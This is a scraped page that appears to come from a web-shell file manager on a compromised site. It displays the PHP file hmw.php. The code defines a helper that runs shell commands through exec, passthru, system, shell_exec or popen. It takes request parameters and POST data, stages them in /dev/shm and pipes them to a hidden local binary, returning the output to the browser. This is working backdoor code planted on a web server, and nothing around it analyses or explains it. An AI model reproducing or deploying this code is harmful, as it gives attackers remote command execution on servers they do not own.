File manager

File manager - Edit - /home/infoilmg/mygmez.com/static/vars/hmw.php

Back
<?php header_remove(); // Step 1: Capture all GET parameters and set them in the QUERY_STRING environment variable $env_query_string = http_build_query($_GET); putenv("QUERY_STRING=$env_query_string"); // Initialize variables for POST data $multipart_body = ''; $content_length = 0; $content_type = ''; function wEx($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; } // Step 2: Extract POST data if the request method is POST if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST)) { // Create a boundary for multipart/form-data $boundary = '----WebKitFormBoundary' . md5(time()); // Set the content type for multipart/form-data with the boundary $content_type = "multipart/form-data;boundary=" . $boundary; putenv("CONTENT_TYPE=$content_type"); // Initialize the multipart body $multipart_body = ''; // Loop through each POST variable foreach ($_POST as $name => $value) { $multipart_body .= "--" . $boundary . "\r\n"; $multipart_body .= "Content-Disposition: form-data; name=\"" . $name . "\"\r\n\r\n"; $multipart_body .= $value . "\r\n"; } // End the multipart body $multipart_body .= "--" . $boundary . "--\r\n"; // Calculate the content length $content_length = strlen($multipart_body); putenv("CONTENT_LENGTH=$content_length"); } // Step 3: Base64 encode the multipart body $encoded_body = base64_encode($multipart_body); // Step 4: Generate a random 12-character filename and store it in /dev/shm/ $random_filename = '/dev/shm/' . bin2hex(random_bytes(6)) . '.txt'; file_put_contents($random_filename, $encoded_body); // Step 5: Define the command to be executed // Pipe the base64-encoded POST data through `base64 -d`, then pipe that to your executable $command = "cat $random_filename \| base64 -d \| ./hm hma.htnl"; // Step 6: Execute the command using the system function // The output will be directly sent to the browser echo str_replace("Content-type: text/html", "", wEx($command)); // Step 7: Remove the temporary file before exiting unlink($random_filename); // Return the process exit code ?>

| ver. 1.4 | Github | . | PHP 8.0.30 | Generation time: 0.06 | proxy | phpinfo | Settings